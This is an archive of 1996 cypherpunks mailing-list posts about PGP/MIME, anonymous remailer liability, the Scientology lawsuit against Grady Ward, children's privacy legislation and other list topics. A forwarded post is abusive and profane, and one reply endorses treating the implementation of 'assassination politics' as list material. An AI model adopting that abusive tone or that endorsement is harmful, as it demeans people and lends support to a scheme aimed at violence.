> end-all-be-all for PGP.  But it's not!  PGP/MIME is meant to securely
> transmit messages across the Internet in a manner which all platforms
> can use.  PGP/MIME is text based because most transport systems in use
> are.  Nowhere is anyone saying "thou shalt not use PGP without MIME."
> I think if more people understood that, we wouldn't have so many
> objections to it.
> 
> > It should not require any additional space overhead  (more than that
> > which may be necessary for transport) when signing and encrypting.
> 
> The note in parens is interesting.  What you consider overhead I consider
> necessary for transport.

In the specific case I mentioned, (signed & encrypted) it is not necessary
for transport. It is only necessary for transport under your mis-designed
system whereby signatures must be taken over entities designed for
transport.

> 
> me

- -- 
Paul Elliott                                  Telephone: 1-713-781-4543
Paul.Elliott@hrnowl.lonestar.org              Address:   3987 South Gessner #224
                                              Houston Texas 77063

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: cp850

iQCVAgUBMaOd5PBUQYbUhJh5AQE6IwP9EjScv5K1CjOUvwBwbW0ovD5iwa/37/5q
WxI7rR8k2jArKQpBm8KKySMQs7YxQD28JU5FjS8IUJBRMkQRBkBZwUvTrWjW0Rs+
EKdyimgjd4KrsmVmHPxfAOhPjjNqUD2DVOWlRNfzc+0f+RW2Bxn3R4/XJQ3sFf5n
0kBISWaYHeg=
=HknB
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Thu, 23 May 1996 18:03:44 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: the system CAN work
In-Reply-To: <XgqcoD39w165w@bwalk.dm.com>
Message-ID: <199605230426.XAA06531@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Dr. Dimitri Vulis wrote:
> So why are you here? Go back to Sovok and improve the government there.
> (I know, you like American welfare :-)

I wonder how long it will take them to create a 
cypherpunks-robomoderated list. :)

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Thu, 23 May 1996 18:35:31 +0800
To: cypherpunks@toad.com
Subject: Re: PROTOCOL: Encrypted Open Books
Message-ID: <199605230631.XAA03491@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:45 PM 5/22/96 -0700, David Wagner wrote:
> a fake account, without a real
>customer, and fakes a transfer into that account, pocketing the
>money that should have gone into that account? 

Then the total indebtedness of the bank will go up, but its total
assets will not.  If the bank does this, then there is no point.

If an employee does this, then the loss will show up on the 
books.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Subir Grewal <grewals@acf2.NYU.EDU>
Date: Thu, 23 May 1996 17:11:11 +0800
To: Bruce Baugh <bruce@aracnet.com>
Subject: Re: The Crisis with Remailers
In-Reply-To: <2.2.32.19960522172644.006bb3f4@mail.aracnet.com>
Message-ID: <Pine.ULT.3.92.960522231944.26453B-100000@acf2.NYU.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 22 May 1996, Bruce Baugh wrote:

:Pointing people at legitimate uses of anonymity, as various folks have
:suggested, is undoubtedly a good idea. Would anyone care to suggest a few
:newsgroups where the vast majority of anonymous posts have really good
:reasons for being so?

On certain political newsgroups (perhaps most noticeably in the
soc.culture.* heirarchy) it's common to see someone's views refuted
because they are identified with a particular interest group.  The
"result" of the argument is suspect simply because it may be considered
favourable to the author's interest-group, the (sometimes rigourous)
argument /justification is pushed aside in the rush to malign another's
contention.  Anonymity serves as a barrier for some of these conjecturous
refutations (though there is a loss of credibility associated with an
anonymous post as well).  In certain other cases, someone may wish to keep
their employer ignorant of their political beliefs.  Then there are all
the cases where one wishes to keep sexual-orientation (or anything else
considered private), membership in an organization from others. There is
no doubt that anonymity is an extremely valuable position to occupy (and
an important option to keep open for everyone).  Of course we tend to hear
of the "bad" uses to which remailers are put.

hostmaster@trill-home.com * Trills 4 thrills * Blue-Ribbon * Lynx 2.5
Anything labeled "NEW" and/or "IMPROVED" isn't.  The label means the
price went up.  The label "ALL NEW", "COMPLETELY NEW", or "GREAT NEW"
means the price went way up.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Key Escrow = Conscription for the masses | 2048 bit via finger

iQB1AwUBMaPb6xwDKqi8Iu65AQH16AL9GIL69AjCdJpmMVULUyFdbvjDu511+H4y
Kbow6o501FiWJJvqNitEqQHVTe+O3RCFIKdW3UyVibb08ndCcvtADbA69+DOIW0H
TPAq5eM6f5EMADg53wnFlimpdl+gnIsT
=edo3
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shabbir@vtw.org (Shabbir J. Safdar)
Date: Thu, 23 May 1996 17:10:10 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.rutgers.edu>
Subject: Re: FTC online workshop on privacy
Message-ID: <199605230414.AAA22841@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


There's actually an interesting parallel here.  If you look at the
Dworkin "ban pornography because speech is action" crowd, they often
end up on the same side of things as the Christian Coalition "ban porn
because it drives you to ungodly acts" crowd.  They both happily support
legislation that would ban such images.  The left and the right move so
far off the edges of the scales that they come around and meet each other
on the same side of the issue.

-Shabbir J. Safdar * Online Representative * Voters Telecomm. Watch (VTW)
 http://www.vtw.org/ * Defending Your Rights In Cyberspace

"E. ALLEN SMITH" writes:
>        It's unsurprising that some of the same groups backing the CDA are
>backing this, since they used danger to children as an excuse for it. (A
>rather transparent one, given the actions vs Compuserve). I am disappointed in
>EPIC for cooperating with them.
>
>From:	IN%"declan+@CMU.EDU"  "Declan B. McCullagh" 22-MAY-1996 17:46:10.71
>
>>Excerpts from internet.cypherpunks: 22-May-96 Re: FTC online workshop on
>>.. by Declan McCullagh@CMU.EDU 
>>> The legislation being introduced at 10:30 am will restrict selling
>>> mailing lists with childrens' names and other identifying info on them,
>>> including email lists. Another attempt to regulate the net, or a good
>>> thing?
>
>>Whoops. I should have said the press conference happened at 10:30 am.
>>The bill will be introduced in both houses later this  week.
>
>>Interesting press conference. Enough is Enough! took quite a bit of time
>>to rant about the dangers of the Internet. Pedophiles, chat rooms,
>>illegal pornography.
>
>>You get the idea.
>
>	Quite.
>	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Thu, 23 May 1996 18:47:45 +0800
To: rittle@comm.mot.com
Subject: Re: Long-Lived Remailers
Message-ID: <199605230524.AAA17410@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


At 20:40 22 May 96 NSA operative Loren James Rittle <rittle@comm.mot.com> 
wrote...

  (This was originally me.  Wow.)

> >::
> >Remailers-To-Chain: 7
> >Remailers-To-Avoid: remailer@nsa.gov
> >Final-Destination: tcmay@got.net
> 
> This will not work.  The original sender must pick the path himself,
> if maximum encryption to hide the final destination is to be used.
> The properly used cypherpunks-style remailer network provides that as
> long as even one remailer in the chain is trustworthy, your secret is
> safe.  Under your scheme, if the first remailer is untrustworthy,
> everything is blown.  This is because unless the original sender
> pick's the path (or at least the last hop explicitly), the final
> destination and message must be available to each hop.

Well, I freely admit that it was just a notion that sort of came
to me whilst at the terminal, with a beer on the desk.  The sort
of thing that often impairs my already-limited judgment :)

Although... is this a possible way to lessen remailer-operator
liability?  If it is known that every remailer along the
way chooses another remailer at random, it might become
less likely to hold any given last-hop remailer liable
for the CO$ documents spewed forth from it.  It would
become necessary to keep track of the final destination and
to decrypt at every stage, unless there's a set Last-Hop:
header; but that would defeat the whole purpose.  Having
traffic going all over the place randomly might be useful
to defeat traffic analysis, though.

I think I've just argued myself out of the whole idea.
Never mind :)

dave

ObCPList: Have I been killfiled yet?  If you don't see
this message, send me a note :)

----  David Smith  Box 324  Cape Girardeau MO USA  63702
http://www.prairienet.org/~dsmith  dsmith@prairienet.org
Reality is only for those lacking in true imagination...
Send mail w/'send pgp-key' in subject for PGP public key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Voters Telecommunications Watch <shabbir@vtw.org>
Date: Thu, 23 May 1996 17:33:40 +0800
To: cypherpunks@toad.com
Subject: INFO: Transcript of Sen. Leahy's RealAudio chat now available! (5/22/96)
Message-ID: <199605230534.BAA08778@panix3.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


=============================================================================
          ____                  _              _   _                   
         / ___|_ __ _   _ _ __ | |_ ___       | \ | | _____      _____ 
        | |   | '__| | | | '_ \| __/ _ \ _____|  \| |/ _ \ \ /\ / / __|
        | |___| |  | |_| | |_) | || (_) |_____| |\  |  __/\ V  V /\__ \
         \____|_|   \__, | .__/ \__\___/      |_| \_|\___| \_/\_/ |___/
                    |___/|_|                                           

           REALAUDIO TRANSCRIPTS OF LEAHY'S WIREDSIDE CHAT AVAILABLE
                       CLIPPER III RESOURCES AVAILABLE
      REP. RICK WHITE (R-WA) SCHEDULED FOR HOTWIRED CHAT 6/5/96 9-10PM EST

                              Date: May 22, 1996

         URL:http://www.crypto.com/            crypto-news@panix.com
           If you redistribute this, please do so in its entirety,
                         with the banner intact.
-----------------------------------------------------------------------------
Table of Contents
        News
        How to receive crypto-news

-----------------------------------------------------------------------------
NEWS

Rave reviews of Senator Leahy's appearance on HotWired's WiredSide chat
are coming already.  With this appearance, the gentleman from Vermont
proves once again that he knows net.politics on a personal level, and
can understands the subtleties that we assume many in Congress are just
learning.

If you missed Sen. Leahy's appearance, arranged by HotWired, the Center
for Democracy and Technology (CDT), and the Voters Telecommunications
Watch (VTW), you can still hear the Realaudio transcript from the
front page at http://www.crypto.com/

A new Clipper III section has been added to www.crypto.com, with pointers
to the online version of the White House proposal and the initial analyses
from EPIC, CDT, and John Gilmore of the EFF.


                                DON'T FORGET!

Representative Rick White (R-WA) will be on HotWired Wednesday June 5th
at 9pm EST at http://www.hotwired.com/wiredside/  You can tune in and listen
to the chat with the RealAudio software (http://www.realaudio.com).  You can
ask questions of the Representative through a moderator and get real,
immediate responses.

Rep. White is part of the new breed of legislators leading Congress to
make better net policy through his leadership in the Internet Caucus,
a vanguard group of legislators who have vowed to provide sound leadership
and advice to other members of Congress in the area of net.policy.

-----------------------------------------------------------------------------
HOW TO RECEIVE CRYPTO-NEWS

To subscribe to crypto-news, sign up from our WWW page (http://www.crypto.com)
or send mail to majordomo@panix.com with "subscribe crypto-news" in the body
of the message.
-----------------------------------------------------------------------------
End crypto-news
=============================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hendersn@zeta.org.au (Zed)
Date: Thu, 23 May 1996 06:07:52 +0800
To: cypherpunks@toad.com
Subject: Re: SEVERE undercapacity, we need more remailer servers FAST (fwd)
Message-ID: <199605221617.CAA05808@godzilla.zeta.org.au>
MIME-Version: 1.0
Content-Type: text/plain



>Had he posted it through a remailer, I think it would have been well
>justified.  He was obviously blowing the whistle on what he saw as illegal
>activities.

The only reason that Keith could post NOTS 34 at all was because it had
previously been posted to a.r.s anonymously. Prior to that, no-one outside
of the Church had a copy of any NOTS materials(or so the Church says).

>  That's a much different matter than posting the entire NOTs
>series, though.  The wholesale copying is what most people seem to object
>to, though my observations tell me that the "Church" objects to any
>copying, even for fair use...

Grady Ward got sued by the Church just because he _asked_ for a NOTS pack to
be sent to him. The Church will do everything within its not inconsiderable
power to prevent NOTS material being disseminated on the Internet - up to
and including destroying the anonymous remailer network.
  Zed(hendersn@zeta.org.au)
"Don't hate the media, become the media" - Jello Biafra
  PGP key on request





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Thu, 23 May 1996 18:10:29 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: re: "Very Famous Reporter"
Message-ID: <199605230657.CAA21475@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 21 May 96 at 10:06, Robert Hettinga wrote:

> In the meantime, it appears that I have egg on my face, as no story has
> emerged...
> 
> By the way, did I say it was a rumor? ;-).

Likely the Very Famous Reporter (tm) misheard something about MD5, 
confused it with DSS (and possibly even something to do with PGP), 
though (s)he had a hot story, spoke to some folx, and it fizzled.

Nah. Just a rumor.


Rob.

---
No-frills sig.
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 23 May 1996 19:37:14 +0800
To: declan+@CMU.EDU
Subject: Re: FTC online workshop on privacy
Message-ID: <01I514L3ED5S8Y4XHY@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"declan+@CMU.EDU"  "Declan B. McCullagh" 22-MAY-1996 19:58:03.69

>Excerpts from cypherpunks: 22-May-96 Re: FTC online workshop on .. by
"E. ALLEN SMITH"@ocelot. 
>>         It's unsurprising that some of the same groups backing the CDA are
>> backing this, since they used danger to children as an excuse for it. (A
>> rather transparent one, given the actions vs Compuserve). I am
>> disappointed in EPIC for cooperating with them.

>You shouldn't be, and I should have been more clear. There is a broad
>coalition of groups supporting this legislation, including (from memory)
>the Kids off Lists! project, Center for Media Education, and Consumer
>Federation of America.

	This appears to be another liberal (e.g., EPIC) vs libertarian
difference. Liberals say we've got to have laws to protect the children, such
as via keeping them from _email_ lists. Libertarians say it's the job of the
parents (and the police, for non-anarchists) to protect the children. Yes,
such lists can be misused (although I see no more reason to say the email ones
can be truly misused than to say the CDA was justified). So can, say,
cryptography.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 23 May 1996 20:09:52 +0800
To: minow@apple.com
Subject: Re: An alternative to remailer shutdowns
Message-ID: <01I5156RK8ZI8Y4XHY@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"minow@apple.com" 23-MAY-1996 01:57:15.69

>-- The remailer operator is legally enjoined from reading messages
>   transversing his system. (For example, the remailer is subject to
>   data privacy laws.)

	I suspect that it is rather unlikely that the court would find a
remailer operator covered by those laws.

>-- The message was encrypted using the intended recipient's public key.
>   (This means that, without access to the private key, the operator
>   has no mechanism to examine the e-mail.)

	This is related to the old ISP liability question, although amplified
by being not only a practical impossibility to filter but close to a physical
impossibility also. (Please note the "close" part.) I am not sure if a judge
could find any grounds to slap a remailer operator with contempt of court in
such a case, but if it were so, Uni has pointed out that it's rather difficult
to override a judge in such a matter, even based on plain facts.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Thu, 23 May 1996 21:11:46 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: FTC online workshop on privacy
Message-ID: <199605230918.FAA22809@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 22 May 96 at 11:16, Rich Graves wrote:

> I'd have to see the bill, but I think it's a good general idea, provided
> there's the caveats KNOWINGLY and WITHOUT THEIR [parent/guardian's]
> KNOWLEDGE. As much as I hate direct marketers, I don't want them subject
> to malicious and arbitrary prosecution because one address out of
> thousands happens to belong to a kid. 

When I was on the FTC privacy list a while back there were more 
details about that.  Companies would set of very commercial web sites 
oriented towards kids, for the main purpose of getting the kids to 
give information about themselves.

So imagine if somebody set up a Barney fan page with all sorts of 
links and goodies but with the encouragement (if not requirement for 
access) to fill out personal information, even personal info about 
family members.

Ok... maybe that's within one's right.  But while (most) adults would 
be suspicious, it's not necessarily so with some children...  (who'd 
give out parent's CC#'s if they knew them).

Teaching kids basic privacy issues is a whole lot better than 
legislation. (Caveat emptor aside, fraud and cons are still 
illegal...).  I haven't seen the legislation so I won't rant for or 
against it (at least not on the list) for now.


Rob.

 
---
No-frills sig.
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Thu, 23 May 1996 17:49:32 +0800
To: Mike Duvos <mpd@netcom.com>
Subject: Re: The Crisis with Remailers
In-Reply-To: <199605222051.NAA20284@netcom21.netcom.com>
Message-ID: <Pine.3.89.9605230533.A19143-0100000@netcom18>
MIME-Version: 1.0
Content-Type: text/plain


	Mike:

On Wed, 22 May 1996, Mike Duvos wrote:

> quite easily.  A 48 bit mantissa can represent 14 decimal digit signed
> integers with no loss of precision, and $999,999,999,999.99 is more
> than enough magnitude for most bean counters. 

	Not when that bean counter is a judge chasing down the
	$ 999 999 999 999.999 999 decimal, for an interest rate 
	calculation.  << You try defending that one to a judge
	who is looking for a reason to dismiss your case, with 
	prejudice. >> 

        xan

        jonathon
        grafolog@netcom.com



**********************************************************************
*								     *
*	Opinions expressed don't necessarily reflect my own views.   *
*								     *
*	There is no way that they can be construed to represent      *
*	any organization's views.				     *
*								     *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
*								     *
*       http://members.tripod.com/~graphology/index.html             *
*								     *
***********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Thu, 23 May 1996 19:48:57 +0800
To: cypherpunks@toad.com
Subject: NOISE.SYS and Win95?
Message-ID: <199605230639.CAA21091@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


I've just got a Pentium and Win95 so I can try to get NOISE.SYS working for
both. It seems to crash in Win'95 though... not sure why  yet: has anybody
used it or had problems with it on Win95/DOS7?

(I've gotten it loaded using a device driver loading util from the command
line, but the RANDOM$ device produces only one byte and a string of zeros...
not good at all. Very bad, actually. URANDOM$ seems to work fine though.)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Byrd <byrd@ACM.ORG>
Date: Fri, 24 May 1996 00:55:26 +0800
To: cypherpunks@toad.com
Subject: subpoenas coming against 2 anon remailers?
Message-ID: <2.2.16.19960523104722.1bf77b98@shore.net>
MIME-Version: 1.0
Content-Type: text/plain


This was posted by henri@netcom.com to alt.religion.scientology:
----------
-----BEGIN PGP SIGNED MESSAGE-----

I have just received urgent email from Grady Ward regarding
the case against him by the cult of $cientology.  Apparently,
the depraved and insane cult of degenerates and reprobates
has decided that Grady Ward is responsible for the recent posting
of the NUTS scriptures, the final secret of the crime cult.

Many of these 'scriptures' are simply recipes for crime, including
how to practice medicine without a license and get away with it,
in defiance of Judge Gessell's order demanding that they cease that
fraud immediately.  Nevertheless, this demented nut-cult has 
demanded a third-party expedited subpoena to obtain the records
from the University of Maryland which they claim will prove their
preposterous allegations.  

Two unnamed anonymous remailers will also be harassed in this 
bizarre fashion, though news on that is sketchy.

The deranged and idiotic cult cites as 'evidence' of their ludicrous
allegation that Grady filed a Motion to Dissolve the injunction
against him after the NUTS pack was posted, on the grounds that it
was then moot.  This is the sole 'proof' they have.  Bullshit and
lies.

So the nut-cult intends to rape remailers with no evidence at all.

- From the criminal cult's filing:

". . .strong inference that defendant (1)is or is acting in concert
with SCAMIZDAT; (2) has made postings of Plaintiff's Advanced Technology
works; (3) may have made or been acting in concert with those who
made the May 6 postings of the NOTs works for the express purpose of
undermining the injunction entered herein.  Defendant certainly let
no grass grow under his feet in attempting to take advantage to [sic] those
postings by asserting the invalidity of the injunction four days later.

"As the collusion become more and more apparent with the latest
blatant attempt to destroy RTC's trade secrets, the need for complete
and expedited discovery of defendant becomes even greater."

Not a scrap of evidence is offered that Grady Ward had anything
to do with SCAMIZDAT, is SCAMIZDAT, or even knows who SCAMIZDAT is.
Just brazen lies, bizarre accusations, and increasingly shrill
and hysterical court filings, now even including sloppy grammar,
as the cult lawyers are obviously working without sleep, and possibly
under the influence of mind-altering drugs.

In further proof of Grady Ward's guilt, the clam-cult offers the
fact that Grady Ward has exchanged email with Alex de Joode, who
operated the now-defunct remailer at utopia.hacktic.nl.  Obviously,
anyone who would associate with such a nefarious remailer operator
must also continually post NUTS packs.

In more absurd claims of the cult, they actually have the gall to
accuse him of "taking advantage" of not having a lawyer while facing
a worldwide criminal organization which has retained dozens of lawfirms
simultaneously in order to fight its frivolous lawsuits against 
everything in existence.

They are claiming that Grady Ward is somehow at an advantage over
them because he doesn't even have a lawyer.  They are also claiming,
this cult which filed hundreds of lawsuits against the IRS alone,
to dodge their taxes, that somehow the net "tricked" them into 
suing everything in sight.

They also claim that Grady Ward (and everyone on the net) obviously
keeps huge archives of mail and news, because "it is inherently 
unbelievable that defendant retypes several paragraphs of identical
wording in message after message."

In short, what the cult is claiming is that quotes ">" in USEnet
followups prove that you keep huge archives.  Apparently, these
invidious cretins have never heard of the "F" key on a keyboard.
One wonders how they manage to type a single word.  "uck you you
motherucking uckhead" just doesn't have the same "zip" without 
an "f" in there now and again, does it?

They also accuse him of keeping huge archives, despite the fact
that he doesn't keep any, because he had a list of cancelled messages
that were feloniously cancelled with forged control messages, 
despite the fact that Ron Newman's web page at
http://www.cybercom.net/~rnewman/scientology/home.html
keeps a complete tally of all the forgeries.

The cult then tries to impugn all of Grady Ward's exhibits as
"unauthenticated and hearsay," because they're USEnet posts, 
while submitting as exhibits all of Grady Ward's posts, which 
by their own claims are ALSO "unauthenticated and hearsay."

In other words, they've blown their own case out of the water!

Well, their case is doomed, but it's still entirely possible
that this imbecilic cult of droolers could cause some damage to
remailers in their last dying thrashings.

h
- --
fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck
f                                                      f
u       "When you can't say 'fuck,' you can't say      u
c       'FUCK THE CDA!' -- Lenny Bruce rephrased       c
k                                                      k
fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck

ObURL:  http://www.cybercom.net/~rnewman/scientology/erlich/defense-fund  

 [ For Public Key: finger henri@netcom.com ]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.i
Comment: PGP signed with SigEd v1.3.1 - http://www.nyx.net/~pgregg/siged/

iQCVAgUBMaKFP2130hVrA/MJAQFaDgQAmWYgLr78HTeH7uNF9pcWnu862IokSt1d
sIR9jjlKRApSSjiOPkNInDf4XwTHUsx6VxpAV16f4d2lEJrNcoRH1sizEKnNeEi3
+V5tqsdaawzYWi6kncHfONTqElshmWnRvXh5Zs1cjW11xjoXlWn2GEViKKO8UHtm
vsK3PXuJEsg=
=+ybQ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Fri, 24 May 1996 00:04:35 +0800
To: cypherpunks@toad.com
Subject: Re: the system CAN work
In-Reply-To: <199605230426.XAA06531@manifold.algebra.com>
Message-ID: <BRoDoD45w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


ichudov@algebra.com (Igor Chudov @ home) writes:

> Dr. Dimitri Vulis wrote:
> > So why are you here? Go back to Sovok and improve the government there.
> > (I know, you like American welfare :-)
>
> I wonder how long it will take them to create a
> cypherpunks-robomoderated list. :)

You mean to filter out Sovoks like the nuriweiller?

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Fri, 24 May 1996 00:21:26 +0800
To: shabbir@vtw.org (Shabbir J. Safdar)
Subject: Re: FTC online workshop on privacy
In-Reply-To: <199605230414.AAA22841@panix4.panix.com>
Message-ID: <Mld4zwG00YUzE1rWMx@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 23-May-96 Re: FTC online workshop on
.. by Shabbir J. Safdar@vtw.or 
> There's actually an interesting parallel here.  If you look at the
> Dworkin "ban pornography because speech is action" crowd, they often
> end up on the same side of things as the Christian Coalition "ban porn
> because it drives you to ungodly acts" crowd.  They both happily support
> legislation that would ban such images.  The left and the right move so
> far off the edges of the scales that they come around and meet each other
> on the same side of the issue.

More to the point, the left and the right come together on privacy issues.

Remember the Christian Coalition's take on national ID cards? "Mark of
the Beast!" (Does anyone have an original cite for this? I also recall
the CC opposing Clipper...)

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 24 May 1996 01:05:12 +0800
To: cypherpunks@toad.com
Subject: SURVEY: Trading on the Internet
Message-ID: <v0300660fadca0292d022@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Sender: e$@thumper.vmeng.com
Reply-To: Ian Grigg <iang@systemics.com> (by way of Rachel Willmer)
Mime-Version: 1.0
Precedence: Bulk
Date: Thu, 23 May 1996 12:37:41 +0100 (BST)
From: Ian Grigg <iang@systemics.com> (by way of Rachel Willmer)
To: Multiple recipients of <e$@thumper.vmeng.com>
Subject: SURVEY: Trading on the Internet

Following on from The Spring Street Brewery's successful IPO, I
am researching the nature of Internet issues of debt and equity.
This envisages the use of electronic token value systems such
as Digicash and the digital bearer bonds that Bob talks about.
The topic is for a management report that I am writing as the
final deliverable in my MBA, and has a lot of bearing on what
we are trying to do within the embryonic Internet Financial System.

So, making whatever assumptions you like (but please mention
them), here goes with some questions:

----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----
Would your company be interested in the idea of issuing on the
Internet?

What specifically would attract you to issuing on the Internet?

What specifically would worry you?

Would you prefer Debt (bonds) or Equity (shares) (or something
more exotic)?

What sort of products/services does your company sell?

Do you think Internet users would be attracted enough to your
company to give you money (e.g. are you the Netscape of '97)?

If not the general Internet community, who would buy your shares or
bonds (local community, funds, family+friends, business contacts...)?

---->8---->8---->8---->8---->8---->8---->8---->8---->8---->8----
That's it, thanks in advance for your patience.  Please forward to
me directly, rather than posting (but post any deeper questions as
they will, no doubt, be welcome).

I am not interested in direct marketing anything (and please don't
ask for a list of respondents), but any interesting answers I would
like to follow up by email to develop them.

Indicate if you want some summarised feedback (won't be for a few weeks).

--
Ian Grigg
iang@systemics.com




--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jay Haines" <jay_haines@connaught-usa.com>
Date: Fri, 24 May 1996 00:26:03 +0800
To: "Leonard Janke" <cypherpunks@toad.com>
Subject: Re: (Another) alternative to
Message-ID: <n1379284116.57328@flu.connaught-usa.com>
MIME-Version: 1.0
Content-Type: text/plain


        Reply to:   RE>(Another) alternative to remailer shutdowns

Where would these message parts be put back together/decrypted? Wouldn't this
require the receivers mail program to re-generate the original message?

--------------------------------------
Instead of having the last remailer in the chain store the plaintext of
an encrypted anonymous message, it might be more convenient to have the 
sender split the message into two messages and send these. The first 
message would contain random characters,  and the second would contain 
the xor of these random characters with the anonymous message. By themselves, 
each piece would, of course, be harmless random text, so remailer operators
greatest crime would be spamming. If the two pieces were sent through 
chains with different last remailers, no one operator could be held
accountable, and, of course, it would be ridiculous to suggest that
one operator could be held responsible for that fact that another
sent some random text which happened to be the xor of the random text
another had sent with a harassing message. (For instance, the
other operator could be trying to frame the first, with the
help of the receiver.) It seems to me that the only way to deal with a 
remailing scheme of this kind would be outlaw anonymous remalining in 
general.

Leonard






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jay Haines" <jay_haines@connaught-usa.com>
Date: Fri, 24 May 1996 00:57:21 +0800
To: "E. ALLEN SMITH" <unicorn@schloss.li
Subject: Re: PROPOSAL
Message-ID: <n1379283936.68201@flu.connaught-usa.com>
MIME-Version: 1.0
Content-Type: text/plain


        Reply to:   RE>>PROPOSAL

Thirded, with bilateral agreement.

--------------------------------------
>Motion: To create the alt.politics.assassination.politics newsgroup and
>the "AP" mailing list so as to clear the meaningless traffic (for which I
>am significantly responsible) out of this forum.

>Any seconds?

	So long as the AP list is specifically for debates about the ethics of
such, seconded. If it would remove from cypherpunks discussion of
implementation or of social consequences, that wouldn't be good, since the
implementation of this is definitely cypherpunks material.
	-Allen






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Fri, 24 May 1996 01:02:54 +0800
To: risks@csl.sri.com
Subject: TILT! Counterfeit pachinko cards send $588 million down the chute.
Message-ID: <v02140b10adca04e78376@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



The WSJ of Wednesday, May 22nd, 1996 (A18) reports that two
Japanese firms lost about 55 billion yen when criminals
counterfeited the stored money cards that they manufactured.
These cards are used to pay for pachinko games, but you can get
refunds wired to an account if you cash in a card. If my memory
serves me correctly, there is a certain amount of skill
involved. If you play well or are lucky, you might even add
money to the cards. But I'm not sure about this detail. In any
case, the people with the counterfeit cards could get refunds
when they didn't pay for the original card.

The Journal mentions three interesting details. First, the cards
were pushed by the police as a means to track the flow of cash
and stop money laundering. Obviously, there wouldn't be these
losses if they could really track the flow. Second, the
convenience of the new cards initially boosted profits because
